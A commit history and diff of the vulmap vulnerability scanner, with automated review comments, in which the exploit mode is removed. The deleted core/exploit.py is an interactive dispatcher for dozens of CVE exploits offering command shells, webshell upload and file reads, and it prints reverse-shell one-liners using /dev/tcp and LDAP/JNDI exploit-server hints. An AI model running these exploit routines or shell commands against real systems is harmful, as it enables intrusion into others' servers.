
10 Commits

Author SHA1 Message Date
之乎者也
3694afb7a3 fofa.info 2022-04-13 21:23:54 +08:00
之乎者也
ca11a0483f fofa.info 2022-04-13 21:23:12 +08:00
之乎者也
c32dbc458e fix dismap 0.2 2021-11-15 13:12:22 +08:00
之乎者也
c63f68c98c Update readme.md 2021-10-15 14:27:01 +08:00
之乎者也
0b26dee9b9 Update readme.md 2021-10-04 21:26:39 +08:00
之乎者也
5370fb0429 Update readme.md 2021-09-27 09:49:14 +08:00
之乎者也
dbdd5b902e wechat group 2021-09-20 09:33:45 +08:00
之乎者也
03c4de5e11 Merge pull request #55 from yumusb/main
Update QiAnXin.py
2021-09-06 14:10:29 +08:00
榆木
8f7ae044e0 Update QiAnXin.py 2021-09-06 12:30:26 +08:00
zhzyker
6bd19e783d rm exploit 2021-09-01 10:58:00 +08:00
10 changed files with 11 additions and 414 deletions


@@ -17,7 +17,6 @@ from module.api.fofa import fofa
from module.api.dns import dns_result, dns_request
from module.api.shodan import shodan_api
from core.scan import scan
from core.exploit import exploit
from identify.identify import Identify
from concurrent.futures import ThreadPoolExecutor, wait, ALL_COMPLETED
@@ -25,6 +24,7 @@ from concurrent.futures import ThreadPoolExecutor, wait, ALL_COMPLETED
class Core(object):
@staticmethod
def control_options(args): # 选项控制,用于处理所有选项
mode = "poc"
delay = globals.get_value("DELAY") # 获取全局变量延时时间DELAY
now_warn = now.timed(de=delay) + color.red_warn()
if args.socks:
@@ -37,8 +37,6 @@ class Core(object):
exit(0)
if args.thread_num != 10: # 判断是否为默认线程
print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num)))
if args.vul is not None: # 判断是否-v进行漏洞利用
args.mode = "exp" # 若进行漏洞利用修改模式为exp
if args.debug is False: # 判断是否开启--debug功能
print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information"))
globals.set_value("DEBUG", "debug") # 设置全局变量DEBUG
@@ -55,7 +53,7 @@ class Core(object):
if os.path.isfile(args.O_JSON): # 判断json输出文件是否冲突
print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_JSON + "] already exists"))
exit(0)
if args.mode is None or args.mode == "poc": # 判断是否进入poc模式
if mode == "poc": # 判断是否进入poc模式
if args.url is not None and args.file is None: # 判断是否为仅-u扫描单个URL
args.url = url_check(args.url) # 处理url格式
if survival_check(args.url) == "f": # 检查目标存活状态
@@ -113,11 +111,6 @@ class Core(object):
print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT))
if args.O_JSON:
print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON))
elif args.mode == "exp": # 漏洞利用模式参数较少
if args.vul is not None and args.url is not None: # 判断是否进入漏洞利用模式
core.control_webapps("url", args.url, args.vul, "exp")
else:
print(now_warn + color.red(" Options error, -v must specify -u"))
else:
print(now_warn + color.red(" Options error ... ..."))
@@ -256,9 +249,6 @@ class Core(object):
joinall(gevent_pool) # 运行协程池
wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完
print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended "))
elif mode == "exp": # 漏洞利用
vul_num = webapps
exploit(target, vul_num) # 调用core中的exploit
@staticmethod
def scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, target):
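Review bot: With `mode = "poc"` assigned as a constant local at the top of `control_options`, the `else:` branch that prints `" Options error ... ..."` (the fallthrough of `if mode == "poc":`) can no longer be reached, and the removal of `-m/--mode` in the same compare means no caller can change it either; either drop the constant together with the dead `else`, or make the intent explicit, e.g. `mode = "poc"  # exploit mode removed 2021-09-01; only poc remains` so the next reader does not go looking for the missing "exp" path. The `elif mode == "exp"` hunk lower down removes the only call into `core.exploit`, so the `mode` parameter of the function it sits in (presumably `control_webapps`) is now always "poc" as well and its remaining callers, outside this view, deserve the same cleanup. Both `control_options` and that second function extend beyond the hunks shown here.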


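--- a/core/exploit.py
+++ /dev/null
@@ -1,390 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-import sys
-from module import globals
-from module.time import now
-from module.color import color
-from module.allcheck import os_check, url_check, survival_check
-from payload.ApacheShiro import ApacheShiro
-from payload.ApacheSolr import ApacheSolr
-from payload.ApacheTomcat import ApacheTomcat
-from payload.Elasticsearch import Elasticsearch
-from payload.Jenkins import Jenkins
-from payload.Spring import Spring
-from payload.OracleWeblogic import OracleWeblogic
-from payload.ApacheFlink import ApacheFlink
-from payload.Nexus import Nexus
-from payload.RadHatJBoss import RedHatJBoss
-from payload.ApacheUnomi import ApacheUnomi
-from payload.ThinkPHP import ThinkPHP
-from payload.Drupal import Drupal
-from payload.ApacheStruts2 import ApacheStruts2
-from payload.Fastjson import Fastjson
-from payload.ApacheDruid import ApacheDruid
-from payload.Laravel import Laravel
-from payload.Vmware import Vmware
-from payload.SaltStack import SaltStack
-from payload.Exchange import Exchange
-from payload.F5_BIG_IP import BIG_IP
-from payload.ApacheOFBiz import ApacheOFBiz
-from payload.QiAnXin import QiAnXin
-from payload.Eyou import Eyou
-from payload.Ecology import Ecology
-explists = ("CVE-2017-12629", "CVE-2019-17558", "S2-005", "S2-008", "S2-009", "S2-013", "S2-015", "S2-016", "S2-029",
-"S2-032", "S2-045", "S2-046", "S2-048", "S2-052", "S2-057", "S2-059", "S2-061", "S2-devMode",
-"CVE-2014-3120", "CVE-2015-1427", "CVE-2016-3088", "CVE-2016-4437", "CVE-2017-12615", "CVE-2020-1938",
-"CVE-2018-7600", "CVE-2018-7602", "CVE-2019-6340", "CVE-2018-1000861", "CVE-2019-7238", "CVE-2020-10199",
-"CVE-2017-3506", "CVE-2017-10271", "CVE-2018-2894", "CVE-2019-2725", "CVE-2019-2729", "CVE-2020-2555",
-"CVE-2020-2883", "CVE-2020-14882", "CVE-2010-0738", "CVE-2010-1428", "CVE-2015-7501", "CVE-2018-20062",
-"CVE-2019-9082", "CVE-2020-13942", "CVE-2020-17519", "CVE-2019-3799", "CVE-2020-5410", "cve-2017-12629",
-"cve-2019-17558", "s2-005", "s2-008", "s2-009", "s2-013", "s2-015", "s2-016", "s2-029", "s2-032",
-"s2-045", "s2-046", "s2-048", "s2-052", "s2-057", "s2-059", "s2-061", "s2-devmode", "cve-2014-3120",
-"cve-2015-1427", "cve-2016-3088", "cve-2016-4437", "cve-2017-12615", "cve-2020-1938", "cve-2018-7600",
-"cve-2018-7602", "cve-2019-6340", "cve-2018-1000861", "cve-2019-7238", "cve-2020-10199", "cve-2017-3506",
-"cve-2017-10271", "cve-2018-2894", "cve-2019-2725", "cve-2019-2729", "cve-2020-2555", "cve-2020-2883",
-"cve-2020-14882", "cve-2010-0738", "cve-2010-1428", "cve-2015-7501", "cve-2018-20062", "cve-2019-9082",
-"cve-2020-13942", "cve-2020-17519", "cve-2019-3799", "cve-2020-5410", "VER-1224-2", "VER-1224-1", "VER-1247",
-"VER-1262", "ver-1224-2", "ver-1224-1", "ver-1247", "ver-1262", "ver-1224-3", "VER-1224-3",
-"CVE-2021-25646", "cve-2021-25646", "CVE-2018-15133", "cve-2018-15133", "CVE-2021-21972", "cve-2021-21972",
-"CVE-2021-25282", "cve-2021-25282", "CVE-2021-27065", "cve-2021-27065", "CVE-2021-22986", "cve-2021-22986",
-"CVE-2020-5902", "cve-2020-5902", "CVE-2021-26295", "cve-2021-26295", "time-2021-0410", "CVE-2021-2109",
-"cve-2021-2109", "cnvd-2021-26422", "CNVD-2021-26422", "CVE-2021-30128", "cve-2021-30128", "time-2021-0515",
-"TIME-202-0515")
-def exploit(target, vul_num):
-target = url_check(target)
-if survival_check(target) == "f":
-print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + target))
-exit(0)
-delay = globals.get_value("DELAY") # 获取全局变量DELAY
-exp_apache_shiro = ApacheShiro(target)
-exp_apache_solr = ApacheSolr(target)
-exp_apache_tomcat = ApacheTomcat(target)
-exp_elasticsearch = Elasticsearch(target)
-exp_apache_flink = ApacheFlink(target)
-exp_jenkins = Jenkins(target)
-exp_spring = Spring(target)
-exp_nexus = Nexus(target)
-exp_oracle_weblogic = OracleWeblogic(target)
-exp_redhat_jboss = RedHatJBoss(target)
-exp_apache_unomi = ApacheUnomi(target)
-exp_thinkphp = ThinkPHP(target)
-exp_drupal = Drupal(target)
-exp_fastjson = Fastjson(target)
-exp_apache_struts2 = ApacheStruts2(target)
-exp_apache_druid = ApacheDruid(target)
-exp_laravel = Laravel(target)
-exp_vmware = Vmware(target)
-exp_saltstack = SaltStack(target)
-exp_exchange = Exchange(target)
-exp_big_ip = BIG_IP(target)
-exp_apache_ofbiz = ApacheOFBiz(target)
-exp_qianxin = QiAnXin(target)
-exp_eyou = Eyou(target)
-exp_ecology = Ecology(target)
-print(now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target))
-print(now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num))
-nc = now.timed(de=0) + color.yel_info() + color.yellow(" input \"nc\" bounce linux shell")
-up = now.timed(de=0) + color.yel_info() + color.yellow(" input \"upload\" upload webshell")
-rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(" RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
-bash = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
-bash_2 = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\"")
-jndi = now.timed(de=0) + color.yel_info() + color.yellow(" Reference https://github.com/feihong-cs/JNDIExploit")
-cmd = "whoami" # 为了消除pycharm错误提示没啥用
-file = "/etc/passwd" # 为了消除pycharm错误提示没啥用
-path = "/tmp/test" # 为了消除pycharm错误提示没啥用
-shiro_key = "1" # 为了消除pycharm错误提示没啥用
-shiro_gadget = "1" # 为了消除pycharm错误提示没啥用
-nexus_u = "admin" # 为了消除pycharm错误提示没啥用
-nexus_p = "admin" # 为了消除pycharm错误提示没啥用
-laravel_key = "null" # 为了消除pycharm错误提示没啥用
-laravel_gadget = 1 # 为了消除pycharm错误提示没啥用
-if vul_num not in explists:
-print(now.timed(de=0) + color.red_warn() + color.red(
-" The vulnerability does not support exploitation. Please refer to \"--list\""))
-sys.exit(0)
-elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
-if os_check() == "linux" or os_check() == "other":
-shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
-shiro_gadget = input(now.timed(de=delay) + color.green("[+] gadget: "))
-elif os_check() == "windows":
-shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
-shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
-while True:
-if os_check() == "linux" or os_check() == "other":
-cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
-elif os_check() == "windows":
-cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
-if cmd == "exit" or cmd == "quit" or cmd == "bye":
-sys.exit(0)
-exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
-elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
-print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml"))
-while True:
-if os_check() == "linux" or os_check() == "other":
-file = input(now.timed(de=delay) + color.green("[+] File >>> "))
-elif os_check() == "windows":
-file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
-if file == "exit" or file == "quit" or file == "bye":
-exit(0)
-exp_apache_tomcat.cve_2020_1938_exp(file)
-elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
-print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
-while True:
-if os_check() == "linux" or os_check() == "other":
-file = input(now.timed(de=delay) + color.green("[+] File >>> "))
-elif os_check() == "windows":
-file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
-if file == "exit" or file == "quit" or file == "bye":
-exit(0)
-exp_spring.cve_2019_3799_exp(file)
-elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
-print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
-while True:
-if os_check() == "linux" or os_check() == "other":
-file = input(now.timed(de=delay) + color.green("[+] File >>> "))
-elif os_check() == "windows":
-file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
-if file == "exit" or file == "quit" or file == "bye":
-exit(0)
-exp_spring.cve_2020_5410_exp(file)
-elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
-print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
-while True:
-if os_check() == "linux" or os_check() == "other":
-file = input(now.timed(de=delay) + color.green("[+] File >>> "))
-elif os_check() == "windows":
-file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
-if file == "exit" or file == "quit" or file == "bye":
-exit(0)
-exp_apache_flink.cve_2020_17519_exp(file)
-elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
-if os_check() == "linux" or os_check() == "other":
-nexus_u = input(now.timed(de=delay) + color.green("[+] Input username: "))
-nexus_p = input(now.timed(de=delay) + color.green("[+] Input password: "))
-elif os_check() == "windows":
-nexus_u = input(now.no_color_timed(de=delay) + "[+] Input username: ")
-nexus_p = input(now.no_color_timed(de=delay) + "[+] Input password: ")
-while True:
-if os_check() == "linux" or os_check() == "other":
-cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
-elif os_check() == "windows":
-cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
-if cmd == "exit" or cmd == "quit" or cmd == "bye":
-sys.exit(0)
-exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)
-elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133":
-if os_check() == "linux" or os_check() == "other":
-laravel_key = input(now.timed(de=delay) + color.green("[+] Input APP_KEY: "))
-elif os_check() == "windows":
-laravel_key = input(now.no_color_timed(de=delay) + "[+] Input APP_KEY: ")
-if os_check() == "linux" or os_check() == "other":
-laravel_gadget = input(now.timed(de=delay) + color.green("[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): "))
-elif os_check() == "windows":
-laravel_gadget = input(now.no_color_timed(de=delay) + "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")
-while True:
-if os_check() == "linux" or os_check() == "other":
-cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
-elif os_check() == "windows":
-cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
-if cmd == "exit" or cmd == "quit" or cmd == "bye":
-sys.exit(0)
-exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget)
-elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972":
-if os_check() == "linux" or os_check() == "other":
-os_type = input(now.timed(de=delay) + color.green("[+] The target os type (linux/windows): "))
-elif os_check() == "windows":
-os_type = input(now.no_color_timed(de=delay) + "[+] The target os type (linux/windows): ")
-while True:
-if os_check() == "linux" or os_check() == "other":
-cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
-elif os_check() == "windows":
-cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
-if cmd == "exit" or cmd == "quit" or cmd == "bye":
-sys.exit(0)
-exp_vmware.cve_2021_21972_exp(cmd, os_type)
-elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282":
-if os_check() == "linux" or os_check() == "other":
-file = input(now.timed(de=delay) + color.green("[+] upload file: "))
-path = input(now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): "))
-elif os_check() == "windows":
-file = input(now.no_color_timed(de=delay) + "[+] upload file: ")
-path = input(now.no_color_timed(de=delay) + "[+] upload path (e.g. /tmp/test.txt): ")
-while True:
-if os_check() == "linux" or os_check() == "other":
-cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
-elif os_check() == "windows":
-cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
-if cmd == "exit" or cmd == "quit" or cmd == "bye":
-sys.exit(0)
-exp_saltstack.cve_2021_25282_exp(cmd, file, path)
-elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065":
-if os_check() == "linux" or os_check() == "other":
-email = input(now.timed(de=delay) + color.green("[+] email: "))
-file = input(now.timed(de=delay) + color.green("[+] webshell name (e.g. shell.aspx): "))
-elif os_check() == "windows":
-email = input(now.timed(de=delay) + "[+] email: ")
-file = input(now.no_color_timed(de=delay) + "[+] uwebshell name (e.g. shell.aspx: ")
-while True:
-if os_check() == "linux" or os_check() == "other":
-cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
-elif os_check() == "windows":
-cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
-if cmd == "exit" or cmd == "quit" or cmd == "bye":
-sys.exit(0)
-exp_exchange.cve_2021_27065_exp(cmd, file, email)
-elif vul_num == "CVE-2021-2109" or vul_num == "cve-2021-2109":
-print(jndi)
-if os_check() == "linux" or os_check() == "other":
-ldap = input(now.timed(de=delay) + color.green("[+] ldap (e.g. ldap://127.0.0.1:1389/Basic/WeblogicEcho ): "))
-elif os_check() == "windows":
-ldap = input(now.no_color_timed(de=delay) + color.green("[+] ldap (e.g. ldap://127.0.0.1:1389/Basic/WeblogicEcho ): "))
-while True:
-if os_check() == "linux" or os_check() == "other":
-cmd = input(now.timed(de=delay) + "[+] Shell >>> ")
-elif os_check() == "windows":
-cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
-if cmd == "exit" or cmd == "quit" or cmd == "bye":
-sys.exit(0)
-exp_oracle_weblogic.cve_2021_2109_exp(ldap, cmd)
-# 远程命令执行漏洞单独简单运行
-else:
-while True:
-if os_check() == "linux" or os_check() == "other":
-cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
-elif os_check() == "windows":
-cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
-if cmd == "exit" or cmd == "quit" or cmd == "bye":
-exit(0)
-elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
-exp_apache_tomcat.cve_2017_12615_exp(cmd)
-elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
-exp_elasticsearch.cve_2014_3120_exp(cmd)
-elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
-exp_elasticsearch.cve_2015_1427_exp(cmd)
-elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
-exp_jenkins.cve_2018_1000861_exp(cmd)
-elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
-exp_oracle_weblogic.cve_2017_3506_exp(cmd)
-elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
-print(nc)
-print(up)
-exp_oracle_weblogic.cve_2017_10271_exp(cmd)
-elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
-exp_oracle_weblogic.cve_2018_2894_exp(cmd)
-elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
-print(nc)
-print(up)
-exp_oracle_weblogic.cve_2019_2725_exp(cmd)
-elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
-print(nc)
-exp_oracle_weblogic.cve_2019_2729_exp(cmd)
-elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
-exp_oracle_weblogic.cve_2020_2555_exp(cmd)
-elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
-exp_oracle_weblogic.cve_2020_2883_exp(cmd)
-elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
-exp_oracle_weblogic.cve_2020_14882_exp(cmd)
-elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
-exp_apache_solr.cve_2017_12629_exp(cmd)
-elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
-exp_apache_solr.cve_2019_17558_exp(cmd)
-elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
-exp_nexus.cve_2019_7238_exp(cmd)
-elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
-exp_redhat_jboss.cve_2010_0738_exp(cmd)
-elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
-exp_redhat_jboss.cve_2010_1428_exp(cmd)
-elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
-exp_redhat_jboss.cve_2015_7501_exp(cmd)
-elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
-exp_apache_unomi.cve_2020_13942_exp(cmd)
-elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
-print(up)
-exp_thinkphp.cve_2019_9082_exp(cmd)
-elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
-exp_thinkphp.cve_2018_20062_exp(cmd)
-elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
-exp_drupal.cve_2018_7600_exp(cmd)
-elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
-exp_drupal.cve_2018_7602_exp(cmd)
-elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
-exp_drupal.cve_2019_6340_exp(cmd)
-elif vul_num == "S2-005" or vul_num == "s2-005":
-exp_apache_struts2.s2_005_exp(cmd)
-elif vul_num == "S2-008" or vul_num == "s2-008":
-exp_apache_struts2.s2_008_exp(cmd)
-elif vul_num == "S2-009" or vul_num == "s2-009":
-exp_apache_struts2.s2_009_exp(cmd)
-elif vul_num == "S2-013" or vul_num == "s2-013":
-exp_apache_struts2.s2_013_exp(cmd)
-elif vul_num == "S2-015" or vul_num == "s2-015":
-exp_apache_struts2.s2_015_exp(cmd)
-elif vul_num == "S2-016" or vul_num == "s2-016":
-exp_apache_struts2.s2_016_exp(cmd)
-elif vul_num == "S2-029" or vul_num == "s2-029":
-exp_apache_struts2.s2_029_exp(cmd)
-elif vul_num == "S2-032" or vul_num == "s2-032":
-exp_apache_struts2.s2_032_exp(cmd)
-elif vul_num == "S2-045" or vul_num == "s2-045":
-exp_apache_struts2.s2_045_exp(cmd)
-elif vul_num == "S2-046" or vul_num == "s2-046":
-exp_apache_struts2.s2_046_exp(cmd)
-elif vul_num == "S2-048" or vul_num == "s2-048":
-exp_apache_struts2.s2_048_exp(cmd)
-elif vul_num == "S2-052" or vul_num == "s2-052":
-exp_apache_struts2.s2_052_exp(cmd)
-elif vul_num == "S2-057" or vul_num == "s2-057":
-exp_apache_struts2.s2_057_exp(cmd)
-elif vul_num == "S2-059" or vul_num == "s2-059":
-exp_apache_struts2.s2_059_exp(cmd)
-elif vul_num == "S2-061" or vul_num == "s2-061":
-exp_apache_struts2.s2_061_exp(cmd)
-elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
-exp_apache_struts2.s2_devMode_exp(cmd)
-elif vul_num == "VER-1224-1" or vul_num == "ver-1224-1":
-print(rmi_ldap)
-exp_fastjson.fastjson_1224_1_exp(cmd)
-elif vul_num == "VER-1224-2" or vul_num == "ver-1224-2":
-exp_fastjson.fastjson_1224_2_exp(cmd)
-elif vul_num == "VER-1224-3" or vul_num == "ver-1224-3":
-exp_fastjson.fastjson_1224_3_exp(cmd)
-elif vul_num == "VER-1247" or vul_num == "ver-1247":
-print(rmi_ldap)
-exp_fastjson.fastjson_1247_exp(cmd)
-elif vul_num == "VER-1262" or vul_num == "ver-1262":
-print(rmi_ldap)
-exp_fastjson.fastjson_1262_exp(cmd)
-elif vul_num == "CVE-2021-25646" or vul_num == "cve-2021-25646":
-print(bash_2)
-exp_apache_druid.cve_2021_25646_exp(cmd)
-elif vul_num == "CVE-2021-22986" or vul_num == "cve-2021-22986":
-exp_big_ip.cve_2021_22986_exp(cmd)
-elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902":
-print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
-exp_big_ip.cve_2020_5902_exp(cmd)
-elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295":
-print(now.timed(de=delay) + color.yel_info() + color.yellow(" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"))
-exp_apache_ofbiz.cve_2021_26295_exp(cmd)
-elif vul_num == "CVE-2021-30128" or vul_num == "cve-2021-30128":
-print(now.timed(de=delay) + color.yel_info() + color.yellow(" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"))
-exp_apache_ofbiz.cve_2021_30128_exp(cmd)
-elif vul_num == "time-2021-0410" or vul_num == "TIME-2021-0410":
-exp_qianxin.time_2021_0410_exp(cmd)
-elif vul_num == "CNVD-2021-26422" or vul_num == "cnvd-2021-26422":
-exp_eyou.cnvd_2021_26422_exp(cmd)
-elif vul_num == "time-2021-0515" or vul_num == "TIME-2021-0515":
-exp_ecology.time_2021_0515_exp(cmd)
-else:
-pass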


@@ -16,7 +16,7 @@ def fofa(fofa, size):
fofa_target = []
keyword = base64.b64encode(str.encode(fofa))
qbase = keyword.decode('ascii')
api_url = "https://fofa.so/api/v1/search/all?email={email}&key={key}&size={size}&qbase64={qbase}".format(email=email, key=key, size=size, qbase=qbase)
api_url = "https://fofa.info/api/v1/search/all?email={email}&key={key}&size={size}&qbase64={qbase}".format(email=email, key=key, size=size, qbase=qbase)
print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa api: " + api_url))
try:
res = requests.get(api_url, headers=headers, timeout=timeout, verify=False)
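Review bot: The rebuilt `api_url` on the new line still embeds the FOFA email and API key in the query string, and the unchanged `print(... " Fofa api: " + api_url)` directly below it echoes that secret to the terminal, and into any captured output, on every run. Build the URL without the credentials and hand them to requests instead: `api_url = "https://fofa.info/api/v1/search/all"` and `res = requests.get(api_url, params={"email": email, "key": key, "size": size, "qbase64": qbase}, headers=headers, timeout=timeout, verify=False)`, so the printed line no longer leaks the key. The request also keeps `verify=False`, which lets anyone on the path to the newly chosen host read that key; since the domain is changing anyway, this is the moment to drop it. The rest of `fofa` is outside the hunk.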


@@ -11,9 +11,7 @@ def arg():
target.add_argument("--fofa", dest="fofa", metavar='keyword', type=str, help=" call fofa api to scan (e.g. --fofa \"app=Apache-Shiro\")")
target.add_argument("--shodan", dest="shodan", metavar='keyword', type=str, help=" call shodan api to scan (e.g. --shodan \"Shiro\")")
mo = parser.add_argument_group("mode", "options vulnerability scanning or exploit mode")
mo.add_argument("-m", "--mode", dest="mode", type=str, help="supports poc and exp, if not specified the default poc")
mo.add_argument("-a", dest="app", type=str, nargs='+', help="specify webapps (e.g. -a \"tomcat\") allow multiple")
mo.add_argument("-v", "--vul", type=str, default=None, help="exploit, specify vuln number (e.g. -v CVE-2019-2729)")
ge = parser.add_argument_group("general", "general options")
ge.add_argument("-h", "--help", action="help", help="show this help message and exit")
ge.add_argument("-t", "--thread", dest="thread_num", type=int, default=10, metavar='NUM',
@@ -42,7 +40,6 @@ def arg():
example.add_argument(action='store_false',
dest="python3 vulmap.py -u http://example.com\n "
"python3 vulmap.py -u http://example.com -a struts2\n "
"python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n "
"python3 vulmap.py -f list.txt -a weblogic -t 20\n "
"python3 vulmap.py -f list.txt --output-json results.json\n "
"python3 vulmap.py --fofa \"app=Apache-Shiro\"")
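Review bot: The `mode` argument group's description, `"options vulnerability scanning or exploit mode"`, still advertises an exploit mode although this hunk removes both `-m/--mode` and `-v/--vul`, so `--help` now promises a mode the parser no longer accepts. Rename it to match what is left: `mo = parser.add_argument_group("mode", "options for vulnerability scanning")`, and since `-a` is now the group's only member the group could be folded into `target` or `general`. The second hunk correctly drops the `-v CVE-2019-2729` example; `arg` continues outside both hunks.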


@@ -140,5 +140,5 @@ def vul_list():
| Vmware vCenter | CVE-2021-21972 | Y | Y | 7.0 < 7.0U1c, 6.7 < 6.7U3l, 6.5 < 6.5U3n, any file upload |
| VMware vRealize | CVE-2021-21975 | Y | N | <= 8.3.0, vmware vrealize operations manager api ssrf |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+
""")
""" + color.yellow("\n Vulmap release does not provide the exploit function after September 1, 2021 \n"))
return vuln_list
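Review bot: The appended notice says the release no longer provides the exploit function, but the table rows right above it (e.g. `| Vmware vCenter | CVE-2021-21972 | Y | Y |`) still carry a second Y/N column — presumably the exp column, its header being outside the hunk — so `--list` keeps telling users an exploit exists for entries the tool can no longer run. Either drop that column from the table or say in the notice what it now means, e.g. `" Vulmap release does not provide the exploit function after September 1, 2021; the exp column is kept for reference only \n"`. The hunk sits inside one long string literal and `vul_list` begins well outside it.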


@@ -7,7 +7,7 @@ from module.time import now
from module.color import color
def dismap(line):
if "dismap 0.1 output file" in line:
if "dismap" in line:
print(now.timed(de=0) + color.yel_info() + color.green(" The file is dismap Identification results"))
globals.set_value("DISMAP", "true")
return "######"
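Review bot: The loosened `if "dismap" in line:` on the new line fires on any input line that merely contains the substring, e.g. a target such as `http://dismap.example.com/` in an ordinary `-f` list, which then flips the `DISMAP` global to "true" for the whole run and turns that target into the `"######"` sentinel. The 0.1 marker was the full `"dismap 0.1 output file"` header; if the 0.2 header still ends in "output file" the check can stay version-agnostic without becoming a substring match, `if "dismap" in line and "output file" in line:`, or anchor it with `line.startswith("dismap")` if the header always starts the line — I cannot see the 0.2 format here, so confirm against a real 0.2 output file. The rest of `dismap`, if any, is outside the hunk.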


@@ -56,7 +56,7 @@ class QiAnXin():
request = requests.post(url, data=data, headers=self.headers, timeout=self.timeout, verify=False)
url = urljoin(self.url, md + ".txt")
req = requests.get(url, data="1", headers=self.headers, timeout=self.timeout, verify=False)
if md in misinformation(req.text, md) and req.status_code == 200:
if md in misinformation(req.text, md) and (md + ".txt") not in req.text and req.status_code == 200:
